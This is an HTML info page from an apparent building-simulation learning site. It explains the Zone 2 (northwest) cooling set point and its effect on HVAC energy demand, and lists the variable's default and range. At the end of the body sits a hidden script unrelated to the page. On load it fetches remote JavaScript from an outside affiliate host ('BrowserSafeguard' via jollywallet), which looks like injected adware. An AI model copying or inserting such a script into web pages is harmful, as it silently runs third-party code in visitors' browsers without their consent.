﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>ZONE 2 (NORTHWEST) COOLING SET POINT</h1>
<h3>Associated System: Zones</h3>
<div class="graphic"> <img src="../HVAC Zone/Thermostat.png" alt=""/ ></div>    
<p>Zone cooling set points are the temperature that an HVAC system tries to maintain within a partcular zone while in cooling mode.</p>      
<!--<p>(<a href="#">See also the �</a> )</p>-->
<p>Decreasing this value will increase the amount cooling required in order for the zone temperature to match the set point. As a consequence, the HVAC energy demand will increase.</p>      
<h4>The value of this variable can be adjusted during a simulation run-time.</h4>      
<h2>Variable Descriptions</h2>
<ul class="list-variable">        
<li><label>Default:</label> 297.649999999999</li>
<li><label>Minimum:</label> 283.149999999999</li>
<li><label>Maximum:</label> 313.149999999999</li>
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->
<li><label>IP Unit:</label> F</li>
<li><label>SI Units:</label> C</li>      </ul>
<h2>Related Items: </h2>
<ul><li>ZONE COOLING SET POINT NIGHT SETUP</li><li>ZONE HEATING SET POINT NIGHT SETBACK</li><li>ZONE HEATING SET POINT</li></ul>
<h2>Links:</h2>
<ul>
<li><a href="http://www.engineeringtoolbox.com/pump-system-curves-d_635.html" target="_blank">http://www.engineeringtoolbox.com/pump-system-curves-d_635.html</a></li><li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li>      </ul>
<div class="version"> Version 1.00</div>
    </div>
  </div>
</div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body>
</html>
